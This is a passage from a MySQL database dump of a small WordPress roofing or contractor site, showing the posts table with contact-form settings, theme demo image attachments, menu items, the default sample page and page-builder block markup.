:5:\"bytes\";i:89;s:11:\"size_before\";i:14807;s:10:\"size_after\";i:14718;s:4:\"time\";d:0.02;}s:14:\"complete_thumb\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.64;s:5:\"bytes\";i:145;s:11:\"size_before\";i:22680;s:10:\"size_after\";i:22535;s:4:\"time\";d:0.02;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.99;s:5:\"bytes\";i:723;s:11:\"size_before\";i:72900;s:10:\"size_after\";i:72177;s:4:\"time\";d:0.06;}}}');
/*!40000 ALTER TABLE `wp0y_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_posts`
--

DROP TABLE IF EXISTS `wp0y_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_title` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_excerpt` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `pinged` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=MyISAM AUTO_INCREMENT=507 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_posts`
--

LOCK TABLES `wp0y_posts` WRITE;
/*!40000 ALTER TABLE `wp0y_posts` DISABLE KEYS */;
INSERT INTO `wp0y_posts` VALUES (6,1,'2022-08-22 00:20:48','2022-08-22 00:20:48','<label> Your name\r\n    [text* your-name] </label>\r\n\r\n<label> Your email\r\n    [email* your-email] </label>\r\n\r\n<label> Subject\r\n    [text* your-subject] </label>\r\n\r\n<label> Your message (optional)\r\n    [textarea your-message] </label>\r\n\r\n[submit \"Submit\"]\n1\nDunrite Roof \"[your-subject]\"\n[_site_title] <admin@dunriteroof.com>\nadmin@dunriteroof.com\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\n[your-message]\r\n\r\n-- \r\nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\nReply-To: [your-email]\n\n\n\n\n[_site_title] \"[your-subject]\"\n[_site_title] <admin@cteisys.com>\n[your-email]\nMessage Body:\r\n[your-message]\r\n\r\n-- \r\nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\nReply-To: [_site_admin_email]\n\n\n\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nPlease fill out this field.\nThis field has a too long input.\nThis field has a too short input.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe uploaded file is too large.\nThere was an error uploading the file.\nPlease enter a date in YYYY-MM-DD format.\nThis field has a too early date.\nThis field has a too late date.\nPlease enter a number.\nThis field has a too small number.\nThis field has a too large number.\nThe answer to the quiz is incorrect.\nPlease enter an email address.\nPlease enter a URL.\nPlease enter a telephone number.','Contact form 1','','publish','closed','closed','','contact-form-1','','','2022-08-22 21:41:56','2022-08-22 21:41:56','',0,'https://cteisys.com/?post_type=wpcf7_contact_form&#038;p=6',0,'wpcf7_contact_form','',0),(8,1,'2022-08-22 00:25:25','2022-08-22 00:25:25','','Theme Demo Import - log_file_2022-08-22__00-25-25','','inherit','open','closed','','theme-demo-import-log_file_2022-08-22__00-25-25','','','2022-08-22 00:25:25','2022-08-22 00:25:25','',0,'https://cteisys.com/wp-content/uploads/2022/08/log_file_2022-08-22__00-25-25.txt',0,'attachment','text/plain',0),(15,1,'2021-05-25 13:48:32','2021-05-25 13:48:32','','video-bg','','inherit','open','closed','','video-bg','','','2021-05-25 13:48:32','2021-05-25 13:48:32','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/video-bg.jpg',0,'attachment','image/jpeg',0),(16,1,'2021-05-25 13:48:32','2021-05-25 13:48:32','','blog-img','','inherit','open','closed','','blog-img','','','2021-05-25 13:48:32','2021-05-25 13:48:32','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img.jpg',0,'attachment','image/jpeg',0),(17,1,'2021-05-25 13:48:33','2021-05-25 13:48:33','','blog-img2','','inherit','open','closed','','blog-img2','','','2021-05-25 13:48:33','2021-05-25 13:48:33','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img2.jpg',0,'attachment','image/jpeg',0),(18,1,'2021-05-25 13:48:33','2021-05-25 13:48:33','','call-icon','','inherit','open','closed','','call-icon','','','2021-05-25 13:48:33','2021-05-25 13:48:33','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/call-icon.png',0,'attachment','image/png',0),(19,1,'2021-05-25 13:48:34','2021-05-25 13:48:34','','email-icon','','inherit','open','closed','','email-icon','','','2021-05-25 13:48:34','2021-05-25 13:48:34','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/email-icon.png',0,'attachment','image/png',0),(20,1,'2021-05-25 13:48:34','2021-05-25 13:48:34','','faq-img','','inherit','open','closed','','faq-img','','','2021-05-25 13:48:34','2021-05-25 13:48:34','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/faq-img.jpg',0,'attachment','image/jpeg',0),(21,1,'2021-05-25 13:48:34','2021-05-25 13:48:34','','instruction-img','','inherit','open','closed','','instruction-img','','','2021-05-25 13:48:34','2021-05-25 13:48:34','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/instruction-img.jpg',0,'attachment','image/jpeg',0),(22,1,'2021-05-25 13:48:35','2021-05-25 13:48:35','','instruction-imgi-bg','','inherit','open','closed','','instruction-imgi-bg','','','2021-05-25 13:48:35','2021-05-25 13:48:35','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/instruction-imgi-bg.png',0,'attachment','image/png',0),(23,1,'2021-05-25 13:48:35','2021-05-25 13:48:35','','project-img1','','inherit','open','closed','','project-img1','','','2021-05-25 13:48:35','2021-05-25 13:48:35','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img1.jpg',0,'attachment','image/jpeg',0),(24,1,'2021-05-25 13:48:35','2021-05-25 13:48:35','','project-img2','','inherit','open','closed','','project-img2','','','2021-05-25 13:48:35','2021-05-25 13:48:35','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img2.jpg',0,'attachment','image/jpeg',0),(25,1,'2021-05-25 13:48:36','2021-05-25 13:48:36','','project-img3','','inherit','open','closed','','project-img3','','','2021-05-25 13:48:36','2021-05-25 13:48:36','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img3.jpg',0,'attachment','image/jpeg',0),(26,1,'2021-05-25 13:48:36','2021-05-25 13:48:36','','project-img4','','inherit','open','closed','','project-img4','','','2021-05-25 13:48:36','2021-05-25 13:48:36','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img4.jpg',0,'attachment','image/jpeg',0),(27,1,'2021-05-25 13:48:36','2021-05-25 13:48:36','','services-img1','','inherit','open','closed','','services-img1','','','2021-05-25 13:48:36','2021-05-25 13:48:36','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img1.jpg',0,'attachment','image/jpeg',0),(28,1,'2021-05-25 13:48:37','2021-05-25 13:48:37','','services-img2','','inherit','open','closed','','services-img2','','','2021-05-25 13:48:37','2021-05-25 13:48:37','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img2.jpg',0,'attachment','image/jpeg',0),(29,1,'2021-05-25 13:48:37','2021-05-25 13:48:37','','services-img3','','inherit','open','closed','','services-img3','','','2021-05-25 13:48:37','2021-05-25 13:48:37','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img3.jpg',0,'attachment','image/jpeg',0),(30,1,'2021-05-25 13:48:37','2021-05-25 13:48:37','','services-img4','','inherit','open','closed','','services-img4','','','2021-05-25 13:48:37','2021-05-25 13:48:37','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img4.jpg',0,'attachment','image/jpeg',0),(31,1,'2021-05-25 13:48:38','2021-05-25 13:48:38','','team-member1','','inherit','open','closed','','team-member1','','','2021-05-25 13:48:38','2021-05-25 13:48:38','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg',0,'attachment','image/jpeg',0),(32,1,'2021-05-25 13:48:38','2021-05-25 13:48:38','','team-member2','','inherit','open','closed','','team-member2','','','2021-05-25 13:48:38','2021-05-25 13:48:38','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg',0,'attachment','image/jpeg',0),(34,1,'2021-05-25 13:50:57','2021-05-25 13:50:57','','slider2','','inherit','open','closed','','slider2','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',336,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2.jpg',0,'attachment','image/jpeg',0),(35,1,'2021-05-25 13:50:58','2021-05-25 13:50:58','','slider3','','inherit','open','closed','','slider3','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',336,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3.jpg',0,'attachment','image/jpeg',0),(36,1,'2021-05-25 13:50:59','2021-05-25 13:50:59','','slider1','','inherit','open','closed','','slider1','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',336,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1.jpg',0,'attachment','image/jpeg',0),(39,1,'2021-05-25 13:52:23','2021-05-25 13:52:23','','testimonial-bg-img','','inherit','open','closed','','testimonial-bg-img','','','2021-05-25 13:52:23','2021-05-25 13:52:23','',0,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/testimonial-bg-img.jpg',0,'attachment','image/jpeg',0),(60,1,'2021-05-26 10:22:12','2021-05-26 10:22:12','','project-img2','','inherit','open','closed','','project-img2-2','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',336,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img2.png',0,'attachment','image/png',0),(130,1,'2021-05-28 06:51:46','2021-05-27 05:00:21',' ','','','publish','closed','closed','','130','','','2021-05-28 06:51:46','2021-05-27 05:00:21','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=130',1,'nav_menu_item','',0),(144,1,'2021-05-28 06:51:46','2021-05-27 05:07:51','','Blog','','publish','closed','closed','','blog','','','2021-05-28 06:51:46','2021-05-27 05:07:51','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=144',14,'nav_menu_item','',0),(197,1,'2021-05-27 05:50:11','2021-05-27 05:50:11',' ','','','publish','closed','closed','','197','','','2021-05-27 05:50:11','2021-05-27 05:50:11','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=197',1,'nav_menu_item','',0),(198,1,'2021-05-27 05:50:11','2021-05-27 05:50:11',' ','','','publish','closed','closed','','198','','','2021-05-27 05:50:11','2021-05-27 05:50:11','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=198',2,'nav_menu_item','',0),(200,1,'2021-05-27 05:50:11','2021-05-27 05:50:11','','Contact','','publish','closed','closed','','contact-2','','','2021-05-27 05:50:11','2021-05-27 05:50:11','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=200',6,'nav_menu_item','',0),(201,1,'2021-05-27 05:50:11','2021-05-27 05:50:11',' ','','','publish','closed','closed','','201','','','2021-05-27 05:50:11','2021-05-27 05:50:11','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=201',5,'nav_menu_item','',0),(202,1,'2021-05-27 05:50:11','2021-05-27 05:50:11',' ','','','publish','closed','closed','','202','','','2021-05-27 05:50:11','2021-05-27 05:50:11','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=202',3,'nav_menu_item','',0),(224,1,'2021-05-27 10:49:46','2021-05-27 10:49:46','','services-single','','inherit','open','closed','','services-single','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',215,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-single.jpg',0,'attachment','image/jpeg',0),(232,1,'2021-05-28 05:52:34','2021-05-27 10:54:56',' ','','','publish','closed','closed','','232','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?p=232',3,'nav_menu_item','',0),(233,1,'2021-05-28 05:52:34','2021-05-27 10:54:56',' ','','','publish','closed','closed','','233','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?p=233',1,'nav_menu_item','',0),(234,1,'2021-05-28 05:52:34','2021-05-27 10:54:56',' ','','','publish','closed','closed','','234','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?p=234',2,'nav_menu_item','',0),(258,1,'2021-05-28 05:39:15','2021-05-28 05:39:15','','floor-modification','','inherit','open','closed','','floor-modification-2','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',336,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/floor-modification.jpg',0,'attachment','image/jpeg',0),(259,1,'2021-05-28 05:39:15','2021-05-28 05:39:15','','roofing','','inherit','open','closed','','roofing-2','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',336,'https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/roofing.jpg',0,'attachment','image/jpeg',0),(281,1,'2021-05-28 05:52:34','2021-05-28 05:52:34',' ','','','publish','closed','closed','','281','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?p=281',4,'nav_menu_item','',0),(282,1,'2021-05-28 05:52:34','2021-05-28 05:52:34',' ','','','publish','closed','closed','','282','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?p=282',5,'nav_menu_item','',0),(145,1,'2021-05-28 06:51:46','2021-05-27 05:07:51','','Contact','','publish','closed','closed','','contact','','','2021-05-28 06:51:46','2021-05-27 05:07:51','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=145',19,'nav_menu_item','',0),(147,1,'2021-05-28 06:51:46','2021-05-27 05:07:51',' ','','','publish','closed','closed','','147','','','2021-05-28 06:51:46','2021-05-27 05:07:51','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=147',20,'nav_menu_item','',0),(164,1,'2021-05-28 06:51:46','2021-05-27 05:15:04',' ','','','publish','closed','closed','','164','','','2021-05-28 06:51:46','2021-05-27 05:15:04','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=164',3,'nav_menu_item','',0),(165,1,'2021-05-28 06:51:46','2021-05-27 05:15:04',' ','','','publish','closed','closed','','165','','','2021-05-28 06:51:46','2021-05-27 05:15:04','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=165',2,'nav_menu_item','',0),(173,1,'2021-05-28 06:51:46','2021-05-27 05:20:54',' ','','','publish','closed','closed','','173','','','2021-05-28 06:51:46','2021-05-27 05:20:54','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=173',11,'nav_menu_item','',0),(174,1,'2021-05-28 06:51:46','2021-05-27 05:20:54',' ','','','publish','closed','closed','','174','','','2021-05-28 06:51:46','2021-05-27 05:20:54','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=174',12,'nav_menu_item','',0),(175,1,'2021-05-28 06:51:46','2021-05-27 05:20:54','','Pages','','publish','closed','closed','','pages','','','2021-05-28 06:51:46','2021-05-27 05:20:54','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=175',10,'nav_menu_item','',0),(193,1,'2021-05-28 06:51:46','2021-05-27 05:35:22',' ','','','publish','closed','closed','','193','','','2021-05-28 06:51:46','2021-05-27 05:35:22','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?p=193',13,'nav_menu_item','',0),(235,1,'2021-05-28 06:51:46','2021-05-27 10:59:28',' ','','','publish','closed','closed','','235','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?p=235',4,'nav_menu_item','',0),(236,1,'2021-05-28 06:51:46','2021-05-27 10:59:28',' ','','','publish','closed','closed','','236','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?p=236',5,'nav_menu_item','',0),(237,1,'2021-05-28 06:51:46','2021-05-27 10:59:28',' ','','','publish','closed','closed','','237','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?p=237',6,'nav_menu_item','',0),(331,1,'2021-05-28 06:51:46','2021-05-28 06:51:46',' ','','','publish','closed','closed','','331','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?p=331',7,'nav_menu_item','',0),(332,1,'2021-05-28 06:51:46','2021-05-28 06:51:46',' ','','','publish','closed','closed','','332','','','2022-08-22 00:25:38','2022-08-22 00:25:38','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?p=332',8,'nav_menu_item','',0),(335,1,'2021-05-24 10:55:43','2021-05-24 10:55:43','<!-- wp:paragraph -->\n<p>This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like pi&#241;a coladas. (And gettin\' caught in the rain.)</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>...or something like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>As a new WordPress user, you should go to <a href=\"https://sktperfectdemo.com/themepack/gbrenovation/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!</p>\n<!-- /wp:paragraph -->','Sample Page','','publish','closed','open','','sample-page-2','','','2021-05-24 10:55:43','2021-05-24 10:55:43','',0,'https://sktperfectdemo.com/themepack/gbrenovation/?page_id=2',0,'page','',0),(336,1,'2021-05-25 05:46:14','2021-05-25 05:46:14','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6572cb3a-e562-4038-ad61-6f87d52a0653\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-6572cb3a-e562-4038-ad61-6f87d52a0653 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6572cb3a-e562-4038-ad61-6f87d52a0653.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6572cb3a-e562-4038-ad61-6f87d52a0653.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6572cb3a-e562-4038-ad61-6f87d52a0653 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6572cb3a-e562-4038-ad61-6f87d52a0653.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"4aa597f7-bf32-48a4-a97d-ab721c46fd1f\"} -->\n<style type=\"text/css\"> .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-4aa597f7-bf32-48a4-a97d-ab721c46fd1f skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"e47140c0-e0cf-490c-8e07-8547639ead1a\"} -->\n<style type=\"text/css\"> .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e47140c0-e0cf-490c-8e07-8547639ead1a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e47140c0-e0cf-490c-8e07-8547639ead1a\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"c574290d-0b76-4326-958f-c0f3a4df2f20\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-c574290d-0b76-4326-958f-c0f3a4df2f20 background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; 